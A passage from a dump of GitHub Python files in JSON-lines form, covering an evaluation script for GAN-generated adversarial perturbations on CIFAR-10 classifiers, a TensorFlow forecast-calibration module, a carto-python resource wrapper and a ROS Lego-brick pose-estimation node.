pcc_value_adv_pert, pcc_value_adv_pert_clean = calculate_mertic(pert, labels,\n f_adv, f_clean,\n f_pert)\n\n if key not in mertics_dict:\n mertics_dict[key] = copy.deepcopy(tmp_dict)\n mertics_dict[key]['adv_cls'].extend(adv_pred)\n mertics_dict[key]['pert_cls'].extend(pert_pred)\n mertics_dict[key]['clean_pert_cls'].extend(adv_ops_pred)\n\n mertics_dict[key]['acc_clean'] += acc_clean\n mertics_dict[key]['acc_adv'] += acc_adv\n mertics_dict[key]['acc_op'] += acc_op\n mertics_dict[key]['acc_op_fr'] += acc_op_fr\n mertics_dict[key]['fooling_num'] += fooling_num\n mertics_dict[key]['accuracy_adv_pert'] += adv_pert_num\n\n mertics_dict[key]['l2_norms_list'].extend(pert_norm)\n mertics_dict[key]['pcc_adv_clean'].extend(pcc_value_adv_clean)\n mertics_dict[key]['pcc_value_adv_pert'].extend(pcc_value_adv_pert)\n mertics_dict[key]['pcc_value_adv_pert_clean'].extend(pcc_value_adv_pert_clean)\n\n mertics_dict[key]['total_samples'] += images.size(0)\n return mertics_dict\n\n\ndef post_propress_dict_data(data_dict, model_list):\n for key, model in model_list.items():\n # most common top100\n data_dict[key]['adv_cls'] = Counter(data_dict[key]['adv_cls']).most_common(100)\n data_dict[key]['pert_cls'] = Counter(data_dict[key]['pert_cls']).most_common(100)\n data_dict[key]['clean_pert_cls'] = Counter(data_dict[key]['clean_pert_cls']).most_common(100)\n\n data_dict[key]['acc_clean'] = round(\n data_dict[key]['acc_clean'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['acc_adv'] = round(\n data_dict[key]['acc_adv'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['acc_op'] = round(\n data_dict[key]['acc_op'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['acc_op_fr'] = round(\n data_dict[key]['acc_op_fr'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['fooling_num'] = round(\n data_dict[key]['fooling_num'] * 100 / data_dict[key]['total_samples'], 2)\n data_dict[key]['accuracy_adv_pert'] = round(\n data_dict[key]['accuracy_adv_pert'] * 100 / data_dict[key]['total_samples'], 2)\n\n data_dict[key]['l2_norms_list'] = round(np.mean(data_dict[key]['l2_norms_list']), 2)\n data_dict[key]['pcc_adv_clean'] = round(np.mean(data_dict[key]['pcc_adv_clean']), 2)\n data_dict[key]['pcc_value_adv_pert'] = round(np.mean(data_dict[key]['pcc_value_adv_pert']), 2)\n data_dict[key]['pcc_value_adv_pert_clean'] = round(\n np.mean(data_dict[key]['pcc_value_adv_pert_clean']), 2)\n return data_dict\n\n\ndef get_model_list(model_name):\n normalize = Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n model_list = {}\n for mn in model_name:\n if \"resnet50\" in mn.lower():\n model = models.resnet50(pretrained=True)\n elif \"vgg16\" in mn.lower():\n model = models.vgg16(pretrained=True)\n elif \"densenet121\" in mn.lower():\n model = models.densenet121(pretrained=True)\n elif \"resnext\" in mn.lower():\n model = models.resnext50_32x4d(pretrained=True)\n elif \"wideresnet\" in mn.lower():\n model = models.wide_resnet50_2(pretrained=True)\n elif \"mnasnet\" in mn.lower():\n model = models.mnasnet1_0(pretrained=True)\n elif \"squeezenet\" in mn.lower():\n model = models.squeezenet1_0(pretrained=True)\n\n model = torch.nn.Sequential(normalize, model)\n model.eval()\n model.to(device)\n model_list[mn] = model\n return model_list\n\n\ndef load_cifar10(args):\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n ])\n testset = torchvision.datasets.CIFAR10(root=args.data_path, train=False,\n download=True, transform=transform_test)\n return testset\n\ndef 
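\n# --- Editor's note (illustration): test_advops_generator above deep-copies tmp_dict once per model;\n# a shallow copy would alias the list fields, so every model would append into the same lists.\ntemplate = {'fooling_num': 0, 'l2_norms_list': []}\na, b = copy.deepcopy(template), copy.deepcopy(template)\na['l2_norms_list'].append(1.0)\nassert b['l2_norms_list'] == []  # with dict(template) or copy.copy(template) this would fail\n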
get_args():\n    parser = argparse.ArgumentParser(description=\"Args Container\")\n    parser.add_argument(\"--data_dir\", type=str, default=r'/mnt/jfs/wangdonghua/pythonpro/AdvOps/cifar10_models/data')\n    parser.add_argument(\"--ckpt_path\", type=str, default='checkpoints/')\n    parser.add_argument(\"--model_ckpt\", type=str, default='cifar10_models/checkpoints/')\n    parser.add_argument(\"--model_name\", type=str, default='resnet50', help=\"model name of the evaluation model\")\n    parser.add_argument(\"--loss_idx\", type=int, default=0, help=\"0: custom_loss, 1: mse_loss, 2:kl_loss\")\n    parser.add_argument(\"--input_size\", type=int, default=224)\n    parser.add_argument(\"--batch_size\", type=int, default=200)\n    args = parser.parse_args()\n    return args\n\n\nif __name__ == \"__main__\":\n    idx2label, _ = get_imagenet_dicts()\n    args = get_args()\n\n    test_transform = transforms.Compose([\n        transforms.Resize(256),\n        transforms.CenterCrop(args.input_size),\n        transforms.ToTensor(),\n    ])\n    # dataset\n    test_data = load_cifar10(args)\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n    model_name_list = {\n        'preactresnet18':f\"{args.model_ckpt}/CIFAR10_preactresnet18.pth.tar\",\n        'wideresnet':f\"{args.model_ckpt}/CIFAR10_wideresnet.pth.tar\",\n        \"resnet50\": f\"{args.model_ckpt}/CIFAR10_resnet50.pth.tar\",\n        \"densenet121\": f\"{args.model_ckpt}/CIFAR10_densenet121.pth.tar\",\n        \"vgg16\": f\"{args.model_ckpt}/CIFAR10_vgg16.pth.tar\",\n        \"vgg19\": f\"{args.model_ckpt}/CIFAR10_vgg19.pth.tar\"\n    }\n\n    model_list = load_model(model_name_list)\n\n    model_name_list = list(model_name_list.keys())\n    logit_type = [\"custom_loss\", \"mse_loss\", \"kl_loss\"]\n\n    # args.model_name is already the model key; indexing the (now) list of names with a string would raise TypeError\n    specific_str = f'{args.model_name}_{logit_type[args.loss_idx]}'\n\n    validation_loader = torch.utils.data.DataLoader(test_data, batch_size=args.batch_size)\n\n    generator_ckpt_file_dict = {\n        \"CIFAR10_resnet50\": f'{args.ckpt_path}/CIFAR10_Generator_for_resnet50.pth',\n        \"CIFAR10_vgg16\": f'{args.ckpt_path}/CIFAR10_Generator_for_vgg16.pth',\n        \"CIFAR10_vgg19\": f'{args.ckpt_path}/CIFAR10_Generator_for_vgg19.pth',\n        \"CIFAR10_densenet121\": f'{args.ckpt_path}/CIFAR10_Generator_for_densenet121.pth',\n        \"CIFAR10_preactresnet18\": f'{args.ckpt_path}/CIFAR10_Generator_for_preactresnet18.pth',\n        \"CIFAR10_wideresnet50\": f'{args.ckpt_path}/CIFAR10_Generator_for_wideresnet50.pth',\n    }\n\n    ckpt_file = generator_ckpt_file_dict[f\"CIFAR10_{args.model_name}\"]\n\n    g = Generator(3, 3)\n    g.load_state_dict(torch.load(ckpt_file))\n    g = g.to(device)\n    g.eval()\n    model_name = args.model_name  # label outputs with the generator's target model rather than always the first list entry\n    attack_metric_dict = test_advops_generator(g, model_list)\n    attack_metric_dict = post_propress_dict_data(attack_metric_dict, model_list)\n    print(f\"Target model: {model_name}\\n Attack: AdvOpsGAN\\n\", attack_metric_dict)\n    result_dict = {\n        \"attack\": \"AdvOpsGAN\",\n        \"target_model\": model_name,\n        \"result\": attack_metric_dict\n    }\n    try:\n        json_string = json.dumps(result_dict, sort_keys=False, cls=NpEncoder)\n        with open(f\"baseline_evaluate_result/{model_name}_AdvOpsGAN_{specific_str}.json\", 'w') as fw:\n            fw.write(json_string)\n    except:\n        with open(f\"baseline_evaluate_result/{model_name}_AdvOpsGAN_{specific_str}.pkl\", 'wb') as fw:  # pickle requires a binary-mode file handle\n            pickle.dump(result_dict, fw)\n    finally:\n        np.save(f\"baseline_evaluate_result/{model_name}_AdvOpsGAN_{specific_str}.npy\", 
result_dict)\n","repo_name":"winterwindwang/AdvOps","sub_path":"baseline_methods_transfer_gan_cifar10.py","file_name":"baseline_methods_transfer_gan_cifar10.py","file_ext":"py","file_size_in_byte":12469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31266492915","text":"import io\nimport os\nimport json\nimport logging\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport matplotlib.pyplot as plt\n\ntfkl = tf.keras.layers\ntfkc = tf.keras.callbacks\ntfd = tfp.distributions\ntfb = tfp.bijectors\n\ndtype = tf.float32\n\nlogger = logging.getLogger(__name__)\n\n\ndef pretty_json(hp):\n json_hp = json.dumps(hp, indent=2)\n return \"\".join(\"\\t\" + line for line in json_hp.splitlines(True))\n\n\ndef lognormal_pdf(loc, scale):\n \"\"\" Lognormal definition as in Wikipedia (FU scipy) \"\"\"\n\n def pdf_fn(x):\n norm = np.sqrt(2 * np.pi) * scale * x\n arg = - (np.log(x) - loc) ** 2 / (2 * scale ** 2)\n return np.exp(arg) / norm\n\n return pdf_fn\n\n\ndef plot_to_image(figure):\n \"\"\"\n Converts the matplotlib plot specified by 'figure' to a PNG image and\n returns it. The supplied figure is closed and inaccessible after this\n call.\n \"\"\"\n\n # Save the plot to a PNG in memory.\n buf = io.BytesIO()\n # plt.savefig(buf, format='png')\n figure.savefig(buf, format='png')\n\n # Closing the figure prevents it from being displayed directly inside\n # the notebook.\n plt.close(figure)\n buf.seek(0)\n\n # Convert PNG buffer to TF image\n image = tf.image.decode_png(buf.getvalue(), channels=4)\n\n # Add the batch dimension\n image = tf.expand_dims(image, 0)\n\n return image\n\n\ndef fig_mean_to_std_distribution(df: pd.DataFrame):\n \"\"\"\n Plot the distribution of the mean to standard deviation ratios\n of the predicted distributions\n \"\"\"\n\n label = 'mean to std ratio of predicted distributions'\n\n fig = plt.figure()\n plt.hist(df['mean'] / df['std'], bins=100, label=label)\n plt.legend()\n\n return fig\n\n\ndef fig_median_to_pct_range_distribution(\n df: pd.DataFrame, qtile_range: tuple[float, float]\n):\n \"\"\"\n Plot the distribution of the ratio btw the median and some percentile\n range.\n\n Params\n ------\n df: table with the columns:\n `q_050`: median\n `q_`: first element of qtile_range\n `q_`: second element of qtile_range\n qtile_range:\n \"\"\"\n\n q1, q2 = qtile_range\n c1, c2 = f'q_{int(q1 * 100):03d}', f'q_{int(q2 * 100):03d}'\n label = f'median to ({c2} - {c1}) ratio of predicted distributions'\n\n fig = plt.figure()\n plt.hist(df['q_050'] / (df[c2] - df[c1]), bins=100, label=label)\n plt.legend()\n\n return fig\n\n\ndef fig_pct_skew(df: pd.DataFrame):\n \"\"\"\n Plot distribution percentile of true values vs fraction of\n observations that belong to a lower percentile\n\n Params\n ------\n df: table with the columns:\n `pct`: percentile to which the observed value corresponds to\n `frac`: fraction of observations that belong to a lower predicted\n percentile\n \"\"\"\n\n label = ('Predicted percentile vs fraction of observations '\n 'that belong to a lower predicted percentile')\n\n fig = plt.figure(figsize=(15, 10))\n plt.scatter(df['pct'], df['frac'], alpha=0.2, s=20, label=label)\n plt.plot([0, 1], [0, 1], color='black', linestyle='dashed')\n plt.legend()\n\n return fig\n\n\ndef fig_pct_skew_discrete(df: pd.DataFrame, quantiles: list):\n \"\"\"\n For a discrete number of predicted percentiles calculate and visualize\n the fraction of observations that 
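\n# --- Editor's note (illustration): the loc/scale convention of lognormal_pdf above maps onto\n# scipy.stats.lognorm as s=scale and scale=exp(loc); a quick numeric check (scipy assumed available):\nfrom scipy.stats import lognorm\npdf = lognormal_pdf(loc=0.5, scale=0.8)\nx = np.array([0.5, 1.0, 2.0])\nassert np.allclose(pdf(x), lognorm.pdf(x, s=0.8, scale=np.exp(0.5)))\n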
are below this percentile\n\n Params\n ------\n df: table with the columns:\n q_< pct >: predicted distribution percentiles\n y: observed value\n \"\"\"\n\n frac = [(df['y'] < df[f'q_{int(q * 100):03d}']).mean()\n for q in quantiles]\n\n label = ('Predicted percentile vs fraction of observations \\n'\n 'that belong to a lower predicted percentile')\n\n fig = plt.figure()\n plt.scatter(quantiles, frac, label=label)\n plt.plot([0, 1], [0, 1], color='black', linestyle='dashed')\n plt.legend()\n\n return fig\n\n\ndef evaluate_percentile_model(\n model,\n ds,\n log_dir: str,\n log_data: dict,\n quantiles: tuple,\n qtile_range: tuple[float, float]\n):\n \"\"\" Compare predicted percentiles against observations \"\"\"\n\n save_dir = os.path.join(log_dir, 'train')\n file_writer = tf.summary.create_file_writer(save_dir)\n\n df = pd.DataFrame()\n df['y'] = np.hstack(list(ds.map(lambda x, y: y).as_numpy_iterator()))\n\n pct_columns = [f'q_{int(x * 100):03d}' for x in quantiles]\n df[pct_columns] = model.predict(ds.map(lambda x, y: x))\n\n fig = fig_pct_skew_discrete(df, quantiles=quantiles)\n\n with file_writer.as_default():\n name = 'predicted pct vs frac of observations with lower predicted pct'\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n fig = fig_median_to_pct_range_distribution(df, qtile_range=qtile_range)\n\n with file_writer.as_default():\n name = \"median to pct-range of predicted distributions\"\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n with file_writer.as_default():\n log_data = pretty_json(log_data)\n tf.summary.text(\"experiment_args\", log_data, step=0)\n\n\ndef evaluate_parametrized_pdf_model(\n model, ds, log_dir: str, log_data: dict, clusters: int = 20\n):\n \"\"\" Compare predicted distributions against observations \"\"\"\n\n save_dir = os.path.join(log_dir, 'train')\n file_writer = tf.summary.create_file_writer(save_dir)\n\n distribution_fn = model.layers[-1].function\n\n model_deterministic = tf.keras.Model(\n inputs=model.inputs,\n outputs=[model.layers[-2].output])\n\n df = pd.DataFrame()\n\n df['y'] = np.hstack(list(ds.map(lambda x, y: y).as_numpy_iterator()))\n\n # predict distribution parameters\n df[['p1', 'p2']] = model_deterministic.predict(ds.map(lambda x, y: x))\n\n distribution = distribution_fn(df[['p1', 'p2']].values)[0]\n\n df['mean'] = distribution.mean()\n df['std'] = distribution.stddev()\n df['pct'] = distribution.cdf(df[['y']].values)\n\n # fraction of prediction with lower percentile\n df = df.assign(frac=lambda x: (x['pct'].sort_values() * 0 + 1).cumsum() / x.shape[0])\n\n \"\"\"\n Figures\n \"\"\"\n\n fig = fig_mean_to_std_distribution(df=df)\n\n with file_writer.as_default():\n name = \"mean to std ratio of predicted distributions\"\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n fig = fig_pct_skew(df.iloc[:1_000])\n\n with file_writer.as_default():\n name = 'predicted pct vs frac of observations with lower predicted pct'\n img = plot_to_image(fig)\n tf.summary.image(name, img, step=0)\n\n with file_writer.as_default():\n log_data = pretty_json(log_data)\n tf.summary.text(\"experiment_args\", log_data, step=0)\n","repo_name":"ImScientist/probabilistic-forecasting-travel-time","sub_path":"src/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70661302914","text":"\"\"\"\nExtensions for pyrestcli Resource and Manager classes\n\n.. 
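\n# --- Editor's note (illustration): the calibration idea behind the percentile plots above, in one check:\n# for a well-calibrated model, about a fraction q of the observations falls below the predicted q-quantile.\nrng = np.random.default_rng(0)\ny = rng.normal(size=10_000)\nq90 = np.quantile(y, 0.9)  # stand-in for a predicted 90th percentile\nassert abs((y < q90).mean() - 0.9) < 0.01\n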
module:: carto.resources\n   :platform: Unix, Windows\n   :synopsis: Extensions for pyrestcli Resource and Manager classes\n\n.. moduleauthor:: Daniel Carrion \n.. moduleauthor:: Alberto Romeu \n\n\n\"\"\"\n\nimport warnings\n\nfrom pyrestcli.resources import Resource, Manager as PyRestCliManager\n\nfrom .exceptions import CartoException\n\n\nclass AsyncResource(Resource):\n    def run(self, **client_params):\n        \"\"\"\n        Actually creates the async job on the CARTO server\n\n\n        :param client_params: To be sent to the CARTO API. See CARTO's\n                                documentation depending on the subclass\n                                you are using\n        :type client_params: kwargs\n\n\n        :return:\n        :raise: CartoException\n        \"\"\"\n        try:\n            self.send(self.get_collection_endpoint(),\n                      http_method=\"POST\",\n                      **client_params)\n        except Exception as e:\n            raise CartoException(e)\n\n    def refresh(self):\n        \"\"\"\n        Updates the information of the async job against the CARTO server.\n        After calling the :func:`refresh` method you should check the `state`\n        attribute of your resource\n\n        :return:\n        \"\"\"\n        if self.get_resource_endpoint() is None:\n            raise CartoException(\"Async job needs to be run or retrieved \\\n                                 first!\")\n\n        super(AsyncResource, self).refresh()\n\n\nclass WarnAsyncResource(AsyncResource):\n    \"\"\"\n    AsyncResource class for resources that represent non-public CARTO APIs.\n    You'll be warned not to use them in production environments\n    \"\"\"\n    def __init__(self, auth_client, **kwargs):\n        \"\"\"\n        Initializes the resource\n        :param auth_client: Client to make (non)authorized requests\n        :param kwargs: Initial value for attributes\n        :return:\n        \"\"\"\n\n        warnings.warn('This is part of a non-public CARTO API and may change in \\\n                      the future. Take this into account if you are using \\\n                      this in a production environment', FutureWarning)\n        super(WarnAsyncResource, self).__init__(auth_client, **kwargs)\n\n\nclass WarnResource(Resource):\n    \"\"\"\n    Resource class for resources that represent non-public CARTO APIs.\n    You'll be warned not to use them in production environments\n    \"\"\"\n    def __init__(self, auth_client, **kwargs):\n        \"\"\"\n        Initializes the resource\n        :param auth_client: Client to make (non)authorized requests\n        :param kwargs: Initial value for attributes\n        :return:\n        \"\"\"\n\n        warnings.warn('This is part of a non-public CARTO API and may change in the future. Take this into account if you are using this in a production environment', FutureWarning)\n        super(WarnResource, self).__init__(auth_client, **kwargs)\n\n\nclass Manager(PyRestCliManager):\n    \"\"\"\n    Manager class for resources\n    \"\"\"\n    def __init__(self, auth_client):\n        \"\"\"\n        :param auth_client: Client to make (non)authorized requests\n\n        :return:\n        \"\"\"\n        self.paginator = self.paginator_class(self.json_collection_attribute,\n                                              auth_client.base_url)\n        super(PyRestCliManager, self).__init__(auth_client)\n","repo_name":"CartoDB/carto-python","sub_path":"carto/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":3366,"program_lang":"python","lang":"en","doc_type":"code","stars":154,"dataset":"github-code","pt":"61"} +{"seq_id":"32943105487","text":"#! 
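\n# --- Editor's note (hedged sketch): the run/refresh life cycle that AsyncResource above enables.\n# ImportJob and auth_client stand in for a concrete subclass and client from the wider carto-python\n# package, and the 'state' attribute is assumed to be populated by refresh().\nimport time\njob = ImportJob(auth_client)  # any AsyncResource subclass\njob.run(url='https://example.com/points.csv')\nwhile job.state not in ('complete', 'failure'):\n    time.sleep(2)\n    job.refresh()  # re-reads the job state from the CARTO server\n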
/usr/bin/env python3\n\nimport os\nimport cv2\nimport math\nimport torch\nimport warnings\nimport numpy as np\nfrom cv_bridge import CvBridge\nfrom pyquaternion import Quaternion as PyQuaternion\n\n# import the custom packages\nimport lib.my_utils as my_utils\nfrom yofo.model import Yofo\n\n# import the necessary ROS packages\nimport rospy\nimport message_filters\nfrom sensor_msgs.msg import Image\nfrom gazebo_msgs.msg import ModelStates\nfrom geometry_msgs.msg import Pose, Point\n\n\n\nPKG_PATH = os.path.dirname(os.path.abspath(__file__))\nMODELS_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"models\")\n\nMODELS = [\n \"X1-Y1-Z2\",\n \"X1-Y2-Z1\",\n \"X1-Y2-Z2\",\n \"X1-Y2-Z2-CHAMFER\",\n \"X1-Y2-Z2-TWINFILLET\",\n \"X1-Y3-Z2\",\n \"X1-Y3-Z2-FILLET\",\n \"X1-Y4-Z1\",\n \"X1-Y4-Z2\",\n \"X2-Y2-Z2\",\n \"X2-Y2-Z2-FILLET\"]\n\nPOSES = [\"UP\", \"DOWN\", \"NORTH\", \"SOUTH\", \"EAST\", \"WEST\"]\n\n\ndef init(camera_name):\n \"\"\"\n Initialize the camera parameters\n \"\"\"\n from sensor_msgs.msg import Image, CameraInfo\n from gazebo_msgs.srv import GetModelState\n camera_info = rospy.wait_for_message(\"/camera/color/camera_info\", CameraInfo)\n rospy.wait_for_service(\"/gazebo/get_model_state\")\n camera_state_srv = rospy.ServiceProxy('/gazebo/get_model_state', GetModelState)\n camera_state = camera_state_srv(camera_name, \"\") # Change this to your model name\n camera_pose = my_utils.rob2cam(camera_state.pose) # Convert to camera axis convention\n\n # Build camera reference frame\n camera_frame = np.zeros((4, 4), dtype=np.float64)\n camera_frame[:, 3] = [camera_pose.position.x, camera_pose.position.y, camera_pose.position.z, 1]\n camera_frame[:3, :3] = camera_pose.orientation.rotation_matrix\n\n # Convert camera pose to numpy\n camera_pose.position = np.array((\n abs(camera_pose.position.x),\n abs(camera_pose.position.y),\n camera_pose.position.z), dtype=np.float64)\n # Convert quaternion to pyquaternion\n camera_pose.orientation = PyQuaternion(\n x=camera_pose.orientation.x,\n y=camera_pose.orientation.y,\n z=camera_pose.orientation.z,\n w=camera_pose.orientation.w\n )\n camera_view = (camera_info.width, camera_info.height)\n camera_matrix = np.array(camera_info.K).reshape((3, 3))\n dist_coeffs = np.array(camera_info.D)\n\n return camera_frame, camera_view, camera_matrix, dist_coeffs\n\n\ndef detect_yofo(image):\n pred = yofo(image).squeeze()\n clss = pred.argmax(dim=0, keepdim=True).flatten().cpu().item()\n conf = pred[clss].cpu().item()\n #clss = pred.sum(axis=0).argmax(dim=0, keepdim=True).flatten().cpu()\n #conf = pred.sum(axis=0)[clss].cpu().item()\n return clss, conf\n\n\ndef detect_yolo(image):\n pred = yolo(image).pandas()\n return pred\n\n\n###############################################################################\n# Callback\n###############################################################################\ndef camera_callback(image_color, image_depth, model_infos):\n global image_view\n image_color = CvBridge().imgmsg_to_cv2(image_color, \"bgr8\")\n depth = CvBridge().imgmsg_to_cv2(image_depth, \"32FC1\")\n\n # Convert depth map to rgb grayscale\n image_depth = -depth + depth.max()\n image_depth *= 255 / 0.20\n image_depth = cv2.cvtColor(image_depth, cv2.COLOR_GRAY2RGB)\n\n # CREATE THE ESTIMATED MODEL STATES MESSAGE\n estimated_model_states = ModelStates()\n\n res = detect_yolo(image_depth)\n for x1, y1, x2, y2, clss_conf, clss_id, clss_nm in res.xyxy[0].to_numpy()[:, :7]:\n if clss_conf < 0.65:\n continue\n\n x1, y1, x2, y2 = int(x1), int(y1), 
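\n# --- Editor's note (illustration): camera_frame built in init() above is a 4x4 homogeneous transform\n# (rotation block plus translation column), so mapping a camera-space point into the world frame is a single product.\nframe = np.eye(4)\nframe[:3, 3] = (0.0, 0.5, 1.2)           # camera position, as filled in by init()\np_cam = np.array([0.1, -0.2, 0.8, 1.0])  # homogeneous point in camera space\np_world = frame @ p_cam                  # -> array([0.1, 0.3, 2.0, 1.0])\n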
int(x2), int(y2)\n\n        # crop the depth image from the bounding box\n        depth_crop = depth[y1:y2, x1:x2]\n        depth_crop_max = depth_crop.max()\n        depth_crop_min = depth_crop.min()  # was depth_crop.max(), which made model_height always zero\n\n        model_info = model_infos[clss_id]\n\n        # Find the contour of the object\n        thresh = depth_crop_max - 0.005\n        rect, angle, depth_crop = my_utils.min_area_crop(depth_crop, thresh)\n        if depth_crop is None: # Object was not found\n            continue\n\n        # Resize the cropped depth image to a 32x32 image\n        depth_crop = cv2.resize(depth_crop, (32, 32), interpolation=cv2.INTER_NEAREST)\n        depth_crop = np.expand_dims(depth_crop, axis=(0, 3))\n\n        # Infer pose using custom model\n        pose_id, pose_conf = detect_yofo(torch.from_numpy(depth_crop))\n\n        model_size = model_info[\"size\"]\n\n        # Get the camera facing axis of the object\n        model_height = depth_crop_max - depth_crop_min\n        if pose_id == 0: # up\n            axis = 2\n        elif pose_id == 1: # down\n            axis = 2\n        else:\n            if model_height < model_size[0] + 0.005:\n                axis = 0\n            else:\n                axis = 1\n\n        # Find the x-y-z coordinates of the object\n        model_xyz = np.array(\n            [int(rect[0][0] + x1),\n             int(rect[0][1] + y1),\n             depth_crop_max + model_height/2,\n             1],\n            dtype=np.float32)\n        model_xyz[:2] /= image_color.shape[1], image_color.shape[0]\n        model_xyz[:2] -= 0.5\n        #model_xyz[:2] -= model_xyz[:2]*2*0.02 # correct for perspective\n        model_xyz[:2] *= (0.900, 0.900)\n        model_xyz = np.dot(camera_frame, model_xyz)\n\n        # Calculate xy-plane rotation mod 180°\n        rotZ = - rect[2] / 90 * (math.pi/2)\n        horizontal = rect[1][0] < rect[1][1] # rect long side is along x-axis\n\n        # Calculate the object quaternion\n        if pose_id == 0: # UP\n            rotZ = rotZ if horizontal else rotZ + math.pi / 2\n            quat = PyQuaternion(axis=(0, 0, 1), angle=0) # z-axis along world-frame z-axis\n        elif pose_id == 1: # DOWN\n            rotZ = rotZ if horizontal else rotZ + math.pi / 2\n            quat = PyQuaternion(axis=(0, 1, 0), angle=math.pi) # z-axis along world-frame negative z-axis\n        elif pose_id == 2: # NORTH\n            quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n            rotZ += 0\n        elif pose_id == 3: # SOUTH\n            quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n            rotZ += math.pi\n        elif pose_id == 4: # EAST\n            quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n            rotZ += -math.pi/2\n        elif pose_id == 5: # WEST\n            quat = PyQuaternion(axis=(1, 0, 0), angle=math.pi/2)\n            rotZ += math.pi/2\n        else:\n            raise ValueError(\"Unknown pose id: {}\".format(pose_id))\n        if axis == 0:\n            quat *= PyQuaternion(axis=(0, 0, 1), angle=math.pi / 2)\n        else:\n            pass\n        quat = PyQuaternion(axis=(0, 0, 1), angle=rotZ) * quat # apply x-y world plane rotation\n\n        # Store the estimated pose\n        estimated_model_states.name.append(model_info[\"name\"])\n        estimated_model_states.pose.append(Pose(\n            Point(*model_xyz[:3]),\n            quat\n        ))\n\n        \"\"\"\n        VISUALIZATION\n        \"\"\"\n        rot_tra = np.zeros((4, 4), dtype=np.float64)\n        # Rotation matrix\n        rot_tra[:3, :3] = quat.rotation_matrix\n        # Transform matrix\n        rot_tra[:4, 3] = (*model_xyz[:3], 1.0)\n\n        # Axes of the model\n        axes = np.ones((4, 4), dtype=np.float64)\n        axes[:, :3] = np.array([\n            [0, 0, 0],   # origin\n            [.1, 0, 0],  # x\n            [0, .1, 0],  # y\n            [0, 0, .1]]) # z\n        axes = np.dot(rot_tra, axes.T)[:3, :]\n        (axes_2dproj, _) = cv2.projectPoints(\n            axes,\n            camera_frame[:3, :3], abs(camera_frame[:3, 3]),\n            camera_matrix, dist_coeffs)\n        axes_2dproj = axes_2dproj.reshape(-1, 2).astype(np.int32)\n\n        cv2.line(image_color,\n                 
axes_2dproj[0],\n axes_2dproj[3],\n (255, 0, 0), 2)\n\n # visualize the yolo bounding box\n # cv2.rectangle(image_show, (x1, y1), (x2, y2), (0, 255, 0), 2)\n\n # visualize the rotated bounding box\n box = np.int0(cv2.boxPoints(rect) + (x1, y1))\n cv2.drawContours(image_color, [box], 0, (0, 0, 255), 2)\n\n # visualize the pose\n text = f\"{POSES[pose_id]} {pose_conf:.2f}\"\n cv2.putText(image_color, text, (x1, y1-5), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0), 1)\n\n # visualize the class\n text = f\"{model_info['name']} {clss_conf:.2f}\"\n cv2.putText(image_color, text, (x1, y2+10), cv2.FONT_HERSHEY_PLAIN, 1, (0, 0, 0), 1)\n\n # Send the estimated model poses\n pub_model_states.publish(estimated_model_states)\n image_view = image_color\n\n\nif __name__ == \"__main__\":\n # Ignore warnings due to YOLOv5 spamming the console when running on CPU\n warnings.simplefilter(\"ignore\")\n\n # Setting default device for pytorch\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n torch.set_grad_enabled(False)\n\n print(\"Initializing vision node\")\n rospy.init_node(\"lego_builder_vision\")\n\n print(\" Loading camera sensor parameters\")\n camera_frame, camera_view, camera_matrix, dist_coeffs = init(\"kinect\")\n\n print(\" Loading pytorch models\")\n yolo = torch.hub.load(\n f\"{PKG_PATH}/yolo/yolov5\",\n \"custom\",\n path=f\"{PKG_PATH}/yolo/best.20epoch.pt\",\n force_reload=True,\n device=device,\n source=\"local\").eval()\n print(f\" + Loaded YOLO on {device}\")\n\n yofo = Yofo().eval()\n yofo.load_state_dict(torch.load(f\"{PKG_PATH}/yofo/last.pt\", map_location=device))\n print(f\" + Loaded YOFO on {device}\")\n\n print(f\" Loading 3D models dimensions\")\n model_infos = []\n for model in MODELS:\n model_infos.append({\n \"name\": model,\n \"size\": my_utils.get_model_size(f\"lego_{model}\", f\"{PKG_PATH}/../models\")\n })\n\n print(f\" Initializing ROS publisher and ROS subscriber\")\n pub_model_states = rospy.Publisher(\"estimated_model_states\", ModelStates, queue_size=1)\n\n sub_image_color = message_filters.Subscriber(\"/camera/color/image_raw\", Image)\n sub_image_depth = message_filters.Subscriber(\"/camera/depth/image_raw\", Image)\n ts = message_filters.TimeSynchronizer([sub_image_color, sub_image_depth], 1, reset=True) # exact sync\n ts.registerCallback(camera_callback, model_infos)\n\n rate = rospy.Rate(1)\n image_view = np.zeros((camera_view[1], camera_view[0], 3), dtype=np.uint8)\n print(f\"Starting main loop...\")\n # Visualize results from camera_callback\n while not rospy.is_shutdown():\n cv2.imshow(\"Predictions\", image_view)\n cv2.waitKey(1)\n rate.sleep()\n","repo_name":"zabealbe/lego-builder","sub_path":"src/lego_builder/lego_builder_vision/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10853,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"71097274433","text":"from AthenaConfiguration.ComponentAccumulator import ComponentAccumulator\nfrom AthenaConfiguration.ComponentFactory import CompFactory\nfrom SCT_Cabling.SCT_CablingConfig import SCT_CablingToolCfg\nfrom SCT_ConditionsTools.SCT_ConditionsToolsConfig import SCT_ConfigurationConditionsToolCfg\nfrom 